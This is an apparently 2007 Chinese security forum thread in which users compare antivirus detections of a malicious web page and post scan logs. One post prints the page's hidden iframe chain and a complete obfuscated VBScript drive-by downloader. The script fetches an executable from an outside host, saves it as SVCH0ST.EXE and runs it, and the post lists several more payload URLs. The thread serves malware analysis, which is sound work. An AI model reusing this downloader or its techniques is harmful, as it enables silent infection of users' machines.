有毒

红心王子

原帖由 tonger2003 于 2007-5-29 13:55 发表


看三楼

怪事了，我再试试

红心王子

应该是没有问题，卡巴7没报，看错了

tonger2003

原帖由 foxhound 于 2007-5-29 13:58 发表
兄弟们~~~~~~~ 我的卡7怎么没报啊~~？？？

可能是打了补丁的缘故吧~~~

worker321

打开网页后，ie下载一个mp3 进来，扫描ie缓存，bd报一个js

反病毒专家 AntiVirusKit 2006 扫描病毒日志记录
版本 16.0.7
双引擎反病毒签名 2007-5-27
开始时间: 2007-5-29 15:24
引擎: KAV 引擎 (AVK 16.10153), BD 引擎 (BD 16.6079)
高启发式: 打开
压缩文件: 打开
系统区域: 打开

扫描系统区域...
扫描所选择的目录和文件...
对象: ms07027[1].js
        路径: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IYWFSNI1
        Status: 已发现病毒
        病毒: Generic.XPL.ADODB.920CE4C0 (BD 引擎)
扫描完成: 2007-5-29 15:24
    已检查 180 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件

1p1

原帖由 foxhound 于 2007-5-29 13:58 发表
兄弟们~~~~~~~ 我的卡7怎么没报啊~~？？？

http://hi.baidu.com/virus1p1/blog/item/ab2df4fb7731a4234e4aea64.html
简单分析

鼻耳盖子

:\WINNT\SYSTEM32\SERVET.EXE C:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMP\SVCH0ST.EXE
:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMP\SVCH0ST.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\W107QN2J\IEXPLORERE[1].EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
:\WINNT\185.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
:\DOCUMENTS AND SETTINGS\MASTER.MASTE\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\A7EPG54J\1[1].EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE

zane_xzz

插入http://www.topfa.cn/ie/5245886.htm
代码如下
<html>
<head>
<body>
<title>111</title>
<iframe src="http://www.topfa.cn/ie/anying.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.topfa.cn/ie/ie.htm" width="100" height="1" frameborder="0"></iframe>
</body>
</head>
</html>
anying.htm-------------->http://www.puma163.com/pu/28.htm----------&gt;http://js.users.51.la/966811.js
ie.htm----------------->http://www.topfa.cn/ie/down/ms07027.js---------&gt;http://www.topfa.cn/ie/down/IEXPLORERE.exe
ie.htm-------------->http://www.topfa.cn/ie/down/main.js
同样下载
<head>
<meta http-equiv="Content-Type" c />
<title>super IE 0Day</title>
</head>
<body>
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.topfa.cn/ie/down/IEXPLORERE.exe"
Set A0 = document.createElement("ob"&"je"&"c"&"t")
A0.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = A0.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
Exe="SV"&"CH"&"0ST.EXE"
Vbs="SV"&"CH"&"OST.VBS"
Set FPI = A0.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
Exe=FPI.BuildPath(sTmp,Exe)
Vbs=FPI.BuildPath(sTmp,Vbs)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
fffff="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"
AdM=AA&AB
Set ZZ = A0.createobject(AdM,"")
ZZ.type=1
ZZ.Open
ZZ.Write Pop.ResponseBody
ZZ.Savetofile Exe,2
ZZ.Close
ZZ.Type=2
ZZ.Open
ZZ.WriteText "On Error Resume Next"&vbCrLf&"Set S = CreateObject(""Wsc""&""ript.S""&""hell"")"&vbCrLf&"S.Run ("""&Exe&""")"&vbCrLf&"Set S = Nothing"
ZZ.Savetofile Vbs,2
ZZ.Close
Set MircoLonga = A0.createobject(fffff&"tion","")
MircoLonga.ShellExecute Vbs,aaa,aaa,"Open",0
</Script?
</body>
</html>



htp://www.topfa.cn/ie/down/svchost1.exe
htp://www.topfa.cn/ie/down/svchost2.exe
htp://www.topfa.cn/ie/down/svchost3.exe
htp://www.topfa.cn/ie/down/svchost4.exe
htp://www.topfa.cn/ie/down/svchost5.exe
htp://www.topfa.cn/ie/down/svchost6.exe
......................................
htp://www.topfa.cn/ie/down/svchost9.exe

1p1

原帖由 zane_xzz 于 2007-5-29 18:10 发表
插入http://www.topfa.cn/ie/5245886.htm
代码如下



111





anying.htm-------------->http://www.puma163.com/pu/28.htm----------&gt;http://js.users.51.la/966811.js
ie.htm---------------- ...

借我的分析http://hi.baidu.com/virus1p1/blog/item/ab2df4fb7731a4234e4aea64.html

你也不说声

qqq000@qq.com

----------
              [凝逸反毒] (http://hi.baidu.com/503165656)

       [凝逸.扫描病毒引擎-日志]       2007.5.31 9:42:38

文件:F:\070501\000\test.cur | 感染:MS鼠标零日漏洞(必杀)
操作:删除文件


扫描完成|病毒:1 文件:2|耗时:170
----------